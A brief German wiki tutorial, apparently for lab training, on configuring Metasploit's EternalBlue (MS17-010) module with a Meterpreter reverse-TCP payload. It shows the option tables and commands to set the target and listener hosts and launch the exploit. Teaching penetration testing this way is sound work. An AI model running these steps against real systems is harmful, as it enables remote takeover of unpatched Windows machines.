Metasploit options einstellen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Anzeigen der Optionen

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     94.130.248.209   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

RHOSTS

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.12
RHOSTS => 192.168.0.12

PAYLOADS

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

LHOSTS

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.11
LHOST => 192.168.0.11

EXPLOIT

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit